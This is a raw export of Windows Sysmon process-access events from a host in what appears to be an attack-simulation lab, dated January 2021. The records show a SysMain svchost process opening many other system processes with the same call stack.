22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-2000-000000001100}1756C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362494Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-2100-000000001100}1864C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362493Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-2200-000000001100}1880C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362492Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-2800-000000001100}1860C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362491Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-3000-000000001100}2272C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362490Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-3300-000000001100}2464C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362489Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-3600-000000001100}2604C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362488Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-3800-000000001100}2704C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362487Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-3900-000000001100}2728C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362486Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-3a00-000000001100}2820C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362485Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-3e00-000000001100}2116C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362484Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-3f00-000000001100}2268C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362483Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4800-000000001100}3612C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362482Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4d00-000000001100}3684C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362481Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a45-6013-4e00-000000001100}3712C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362480Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a46-6013-5600-000000001100}3968C:\Windows\system32\dashost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362479Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a46-6013-5900-000000001100}4288C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362478Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a46-6013-5b00-000000001100}4740C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362477Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a47-6013-6200-000000001100}5024C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362476Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a47-6013-6e00-000000001100}5724C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362475Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2abf-6013-c600-000000001100}1720C:\Windows\system32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362474Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2ac0-6013-cd00-000000001100}4284C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362473Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2ac0-6013-ce00-000000001100}4516C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362472Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-3378-6013-6902-000000001100}2684C:\Windows\System32\WUDFHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362471Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-3378-6013-6b02-000000001100}5824C:\Windows\system32\fontdrvhost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362470Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-3378-6013-6c02-000000001100}5208C:\Windows\system32\dwm.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362469Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-2a46-6013-5800-000000001100}4024C:\Windows\system32\sppsvc.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362468Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-337b-6013-8802-000000001100}2852C:\Windows\System32\svchost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362467Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:50.154{8e433fbf-2a45-6013-2600-000000001100}14722140C:\Windows\system32\svchost.exe{8e433fbf-337c-6013-8e02-000000001100}1960C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe0x3000C:\Windows\SYSTEM32\ntdll.dll+9c584|C:\Windows\System32\KERNELBASE.dll+2730e|c:\windows\system32\sysmain.dll+446bf|c:\windows\system32\sysmain.dll+1e441|c:\windows\system32\sysmain.dll+1e366|c:\windows\system32\sysmain.dll+1e24d|c:\windows\system32\sysmain.dll+1e0b1|c:\windows\system32\sysmain.dll+1c32b|c:\windows\system32\sysmain.dll+1bf95|c:\windows\system32\sysmain.dll+74a8d|c:\windows\system32\sysmain.dll+73ab2|c:\windows\system32\sysmain.dll+60223|C:\Windows\system32\svchost.exe+314c|C:\Windows\System32\sechost.dll+2de2|C:\Windows\System32\KERNEL32.DLL+17bd4|C:\Windows\SYSTEM32\ntdll.dll+6ced1 10341000x8000000000000000362466Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 